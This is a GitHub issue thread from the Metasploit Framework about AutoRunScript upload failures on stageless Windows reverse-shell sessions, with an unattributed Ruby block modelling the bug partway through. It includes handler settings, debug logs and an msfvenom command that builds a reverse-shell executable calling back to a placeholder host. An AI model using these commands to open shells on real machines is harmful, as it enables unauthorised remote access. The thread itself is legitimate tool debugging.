rapid7 / metasploit-framework

Issue with "Download", "Upload" #18540

Closed Admin9961 closed 9 months ago

Admin9961 commented 12 months ago

In command shell, these 2 commands work only when interacting with the session, but if you try to automate it through "AutoRunScript", these 2 commands will fail with the statement:

```
[*] Processing shell_scripts.rc for ERB directives.
resource (shell_scripts.rc)> upload H1.txt H1.txt
[*] Max line length is 4096
[*] /usr/bin/printf '\0\377\376\116\130\114\103\177\45\45\15\12' Failed: nil != "\x00\xFF\xFENXLC\x7F%%\r\n"
[*] printf '\0\377\376\106\104\112\107\177\45\45\15\12' Failed: nil != "\x00\xFF\xFEFDJG\x7F%%\r\n"
[*] /usr/bin/printf %b '\0\377\376\122\112\131\127\177\45\45\15\12' Failed: nil != "\x00\xFF\xFERJYW\x7F%%\r\n"
[*] printf %b '\0\377\376\103\121\132\126\177\45\45\15\12' Failed: nil != "\x00\xFF\xFECQZV\x7F%%\r\n"
[*] perl -e 'print("\0\377\376\101\116\117\124\177\45\45\15\12")' Failed: nil != "\x00\xFF\xFEANOT\x7F%%\r\n"
[*] gawk 'BEGIN {ORS="";print "\x00\xff\xfe\x47\x50\x50\x4d\x7f\x25\x25\x0d\x0a"}' </dev/null Failed: nil != "\x00\xFF\xFEGPPM\x7F%%\r\n"
[-] Error occurred while uploading <H1.txt> to <H1.txt> - Connection reset by peer
```

Another try was performed by inserting the complete path in resource.rc, and it failed as well. I specify that this happened against a Windows 10 machine with a native windows/x64/shell_reverse_tcp. I don't know if other command shell based payloads are affected. The "H1.txt" was just 7 bytes of data. The attempt further causes the session to crash and exit.

github-actions[bot] commented 12 months ago

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

The easier it is for us to replicate and debug an issue, the higher the chance of it being resolved.

Admin9961 commented 12 months ago

This time I did it with the PowerShell variant of the payload (cmd/windows/powershell/x64/shell_reverse_tcp) and I got the same error as well; however the debug log looks weird, it says that I miss a dependency for another payload which I'm not working on (the encrypted/shell variant), then another fake error (can't bind to 0.0.0.0:8443, which is false lol). Here is the full snippet from the "debug" command (AV is disabled, this is not an AV problem):

## Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

```
[framework/features]
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
payload=cmd/windows/powershell/x64/shell_reverse_tcp
LPORT=[private_port]
LHOST=[private_ip]
ExitOnSession=false
AutoUnhookProcess=false
AutoSystemInfo=true
AutoLoadStdapi=true
MeterpreterDebugBuild=false
EnableStageEncoding=false
StagerVerifySSLCert=false
EXITFUNC=process
AutoRunScript=shell_scripts.rc
CommandShellCleanupCommand=
InitialAutoRunScript=
AutoVerifySession=true
CreateSession=true
EnableContextEncoding=true
VERBOSE=true
WORKSPACE=
WfsDelay=2
ContextInformationFile=
DisablePayloadHandler=false
ListenerTimeout=0
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
PrependMigrate=false
PrependMigrateProc=
PayloadBindPort=
AutoVerifySessionTimeout=30
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
MeterpreterDebugLogging=
EXTENSIONS=
EXTINIT=
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=auto
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=true
Powershell::sub_funcs=false
Powershell::exec_in_place=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
```

```
[11/14/2023 21:13:26] [e(0)] core: Exploit failed (multi/handler): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8443). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8443).
[11/14/2023 21:15:00] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 21:15:04] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 21:18:11] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 21:19:01] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 21:21:03] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 21:21:09] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 21:26:52] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 21:29:59] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 21:30:07] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
```

## Web Service Errors

The following web service errors occurred before the issue occurred:

```
msf-ws.log does not exist.
```

## Framework Logs

The following framework logs were recorded before the issue occurred:

```
[11/14/2023 19:00:45] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[11/14/2023 19:41:10] [w(0)] core: Session manipulation failed: can't be called from trap context
[11/14/2023 19:48:37] [i(0)] core: Trying to continue despite failed database creation: could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 5433?
[11/14/2023 19:48:37] [e(0)] core: DB.connect threw an exception - ActiveRecord::ConnectionNotEstablished could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 5433?
[11/14/2023 19:48:37] [e(0)] core: Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 5433?
[11/14/2023 19:48:43] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[11/14/2023 19:48:43] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[11/14/2023 19:48:50] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[11/14/2023 19:48:51] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[11/14/2023 19:51:52] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 19:52:14] [d(0)] core: Session 1 failed to negotiate TLV encryption
[11/14/2023 20:10:03] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 20:30:27] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 20:34:35] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 20:40:15] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 20:44:38] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:38] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:39] [w(0)] core: Exception in scheduler thread EOFError EOFError
[11/14/2023 20:56:41] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 20:58:29] [e(0)] core: Errno::ENOENT No such file or directory @ rb_sysopen -
[11/14/2023 21:03:05] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 21:10:30] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 21:13:26] [e(0)] core: Exploit failed (multi/handler): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8443). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8443).
[11/14/2023 21:15:00] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 21:15:04] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 21:18:11] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 21:19:01] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 21:21:03] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 21:21:09] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 21:26:52] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[11/14/2023 21:29:59] [e(0)] core: Errno::ECONNRESET Connection reset by peer
[11/14/2023 21:30:07] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
```

## Web Service Logs

The following web service logs were recorded before the issue occurred:

```
msf-ws.log does not exist.
```

## Version/Install

The versions and install method of your Metasploit setup:

```
Framework: 6.3.42-dev-
Ruby: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
OpenSSL: OpenSSL 1.1.1m 14 Dec 2021
Install Root: /opt/metasploit-framework/embedded/framework
Session Type: postgresql selected, no connection
Install Method: Omnibus Installer
```

Admin9961 commented 12 months ago

Update: the issue doesn't happen with staged command shell payloads, just stageless ones (windows/x64/shell_rev_tcp & win/shell_rev_tcp), the basic stageless payload, not the "encrypted" variant. I don't miss any dependency; it's a stageless command shell bug, confirmed.

adfoster-r7 commented 12 months ago

Thanks for the update; Any idea what's going wrong? 👀

Admin9961 commented 12 months ago

Basically it looks like AutoRunScript can't download/upload data (not even a 1 byte .txt) if the selected payload is stageless (as a result you get the error shown at the start of the post). By selecting a staged payload things work as expected. This applies just to the Windows command shell, not to Meterpreter. Meterpreter is not affected by the flaw. I don't exactly know how to solve this issue on my own, I need someone to open a pull request. The issue is not environment related, my Linux distro is not flawed.

Admin9961 commented 12 months ago

To emulate the bug, just do `msfvenom -p windows/shell_reverse_tcp lhost=IP lport=port -f exe -o shell.exe`, then `vim myscript.rc` => `upload yourexample.txt yourexample.txt` (you don't have to actually specify the full path).

Listener conf, then AutoRunScript => myscript.rc, run, and you should get the bugged output I've posted at the start.

Admin9961 commented 12 months ago

If you do the same steps with a staged payload, for example the classic windows/shell/reverse_tcp, everything works. I think this may be happening because stageless sessions are less interactive. The flaw is restricted to AutoRunScript, because you have the issue "solved" by interacting with the shell manually, but having such a cool feature as AutoRunScript flawed is not good. Automating routine is important.

bwatters-r7 commented 11 months ago

If I'm understanding correctly, the issue only happens on a stageless shell session when you do an autorun? And it does not happen if you interact with the staged session? I have 2 wild guesses: 1) There might be an issue with initializing the channel.... maybe there's some garbage in it. I can't explain why it would behave differently in staged and stageless, though, so I'd be a little surprised if this was the case. 2) Curious if there's a race condition where the autorun script sends commands through the connection before the payload is completely ready. A stageless payload is going to have everything set up before the callback ever hits the framework listener, but a staged session still has to upload and inject the second stage. A test for this would be to just add a sleep or something as the first command in the script.

EDIT: No, I see I had that backward..... stageless does not work, but staged does..... weird.

bwatters-r7 commented 11 months ago

Can you post the full command for msfvenom without IPs? Basically, I want to know what fileformat and any options you're using.

Admin9961 commented 11 months ago

`msfvenom -p windows/shell_reverse_tcp lhost=x.x.x.x lport=x.x.x.x -f exe -o test.exe`. Do a test yourself, you'll see I'm right. In "AutoRunScript" just put a "script.rc" containing the string `upload test.txt test.txt`. For my own test there was no need to specify the path because I'm working in just "current folder mode", no need to specify the full path. By interacting with the session and typing the upload command manually the issue is "solved"; it's basically an AutoRunScript failure. Normal behavior: the file should be encoded in base64, then decoded with certutil on the remote target.

On the listener I have the default conf:

```
   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ExitOnSession           true             yes       Return from the exploit after a session has been created
   ListenerTimeout         0                no        The maximum number of seconds to wait for new sessions
   VERBOSE                 true             no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
```

Payload advanced options (windows/shell_reverse_tcp):

```
   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript               script.rc        no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   PrependMigrate              false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                           no        Process to spawn and run shellcode in
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     true             no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module
```

Admin9961 commented 11 months ago

I found another interesting string in the debug command: `RuntimeError Can't find command on the victim for writing binary data` <= ???

bwatters-r7 commented 11 months ago

Doing some quick looking, `Can't find command on the victim for writing binary data` is an error generated by `_write_file_unix_shell` when it cannot find a suitable binary to send data. In a couple of minutes of checking, I don't think this method should be called when the session platform is Windows. What do you get when you run `sessions -l` and `sessions -x` at the msf prompt while these sessions are connected?

bwatters-r7 commented 11 months ago

Oooops; I meant `sessions -v`

Admin9961 commented 11 months ago

`sessions -l` output:

```
  7         shell x86/windows  Shell Banner: Microsoft Windows [Version 10.0.19042.844] (c) 2020 Microsoft ...  my_ip:8443 -> remote_ip:12501 (remote_ip)
  8         shell x86/windows  Shell Banner: Microsoft Windows [Version 10.0.19042.844] (c) 2020 Microsoft ...
```

Output for `sessions -v`:

```
Active sessions
===============

  Session ID: 7
        Name:
        Type: shell windows
        Info:
Shell Banner:
Microsoft Windows [Version 10.0.19042.844]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\(private path)>
-----

      Tunnel: my_ip:8443 -> remote_ip:12501 (remote_ip)
         Via: exploit/multi/handler
   Encrypted: No
        UUID:
     CheckIn: <none>
  Registered: No

  Session ID: 8
        Name:
        Type: shell windows
        Info:
Shell Banner:
Microsoft Windows [Version 10.0.19042.844]
(c) 2020 Microsoft Corporation. All rights reserved.
-----

      Tunnel: my_ip:8443 -> remote_ip:12504 (remote_ip)
         Via: exploit/multi/handler
   Encrypted: No
        UUID:
     CheckIn: <none>
  Registered: No
```

Admin9961 commented 11 months ago

Can I know where these methods are defined? I'm trying to investigate on my own but I can't find autorunscript.rb

Admin9961 commented 11 months ago

Yes, this is happening because msf doesn't perform enough validation before launching AutoRunScript, thus making bad assumptions. I confirmed that casually:

```
[*] Session ID 12 (x.x.x.x.x.x.x.x:443 -> 204.101.161.xx:40061) processing AutoRunScript 'script.rc'
[*] Processing script.rc for ERB directives.
```

I was running tests on my own devices, when at some point an unknown guy port-scanned my listener (it's not the IP of my own device lol, he was probably not even running Windows). The correct behaviour should be that it first checks if the session is valid, then starts processing commands. It started "Processing script.rc" first instead, without any session check before starting.
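A small Ruby model of the ordering problem described in this thread (the `_write_file_unix_shell` mis-dispatch noted earlier and the missing session check above), as an added example that is not Metasploit's own code: `ShellSession`, `upload_commands_for` and the `run_autorun_script_*` functions are hypothetical names, and the banners and "available command" lists are constructed for the demonstration. It shows the unverified session falling through to the Unix writer and erroring, and the verified order selecting the certutil path or skipping an unidentified connection.

```ruby
# Added example, not Metasploit's code: a self-contained model of the
# ordering problem the thread describes. ShellSession, upload_commands_for
# and the run_autorun_script_* functions are hypothetical names; the banners
# and "available command" lists below are constructed for the demonstration.
require 'base64'

# Constructed banners standing in for the first bytes a reverse shell sends.
WINDOWS_BANNER = "Microsoft Windows [Version 10.0.19042.844]\r\n" \
                 "(c) 2020 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\work>"
SILENT_BANNER  = '' # a connection that sent nothing, e.g. a port scanner

# Unix-side writers the shell upload can fall back on (two of the candidates
# listed in the output at the top of the issue), keyed by the binary needed.
UNIX_WRITERS = {
  'printf' => ->(esc, path) { "printf '#{esc}' > #{path}" },
  'perl'   => ->(esc, path) { "perl -e 'print(\"#{esc}\")' > #{path}" }
}.freeze

class ShellSession
  attr_reader :platform, :available_commands

  def initialize(banner, available_commands: [])
    @banner = banner
    @available_commands = available_commands
    @platform = nil # unknown until the banner has been examined
  end

  # Platform detection from the banner. A stageless shell has no stage that
  # announces the target, so before this runs nothing is known about it.
  def detect_platform!
    @platform = if @banner.match?(/Microsoft Windows/i)
                  :windows
                elsif @banner.match?(/[$#] \z/) # unix-style prompt
                  :unix
                end
  end

  def valid?
    !@platform.nil?
  end
end

# Windows path: ship the file as base64 and decode it with certutil, the
# "normal behaviour" the reporter describes. The redirection is written
# before echo so that a base64 chunk ending in a digit (e.g. "...1>>") is
# not parsed by cmd.exe as a handle redirect.
def windows_upload_commands(data, remote_path)
  b64 = Base64.strict_encode64(data)
  cmds = b64.scan(/.{1,64}/).map { |chunk| ">>#{remote_path}.b64 echo #{chunk}" }
  cmds << "certutil -decode #{remote_path}.b64 #{remote_path}"
  cmds << "del #{remote_path}.b64"
end

# Unix path: find a writer that exists on the target and emit the bytes as
# octal escapes. On a Windows cmd session none exists, which is the
# RuntimeError quoted from the debug output.
def unix_upload_commands(session, data, remote_path)
  name, builder = UNIX_WRITERS.find { |n, _| session.available_commands.include?(n) }
  raise RuntimeError, "Can't find command on the victim for writing binary data" unless name
  esc = data.bytes.map { |b| format('\\%03o', b) }.join
  [builder.call(esc, remote_path)]
end

# Dispatch on the recorded platform. An unknown (nil) platform falls through
# to the Unix writer, which is the mis-dispatch the thread observes.
def upload_commands_for(session, data, remote_path)
  case session.platform
  when :windows then windows_upload_commands(data, remote_path)
  else unix_upload_commands(session, data, remote_path)
  end
end

# Buggy order (what the reporter saw): the script runs before the session
# has been identified.
def run_autorun_script_unverified(session, data, remote_path)
  upload_commands_for(session, data, remote_path)
rescue RuntimeError => e
  { error: e.message }
end

# Corrected order: identify the session first, skip the script for a
# connection that never identified itself, and only then dispatch.
def run_autorun_script_verified(session, data, remote_path)
  session.detect_platform!
  return { error: 'session not verified, script skipped' } unless session.valid?
  upload_commands_for(session, data, remote_path)
end
```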

github-actions[bot] commented 10 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 9 months ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.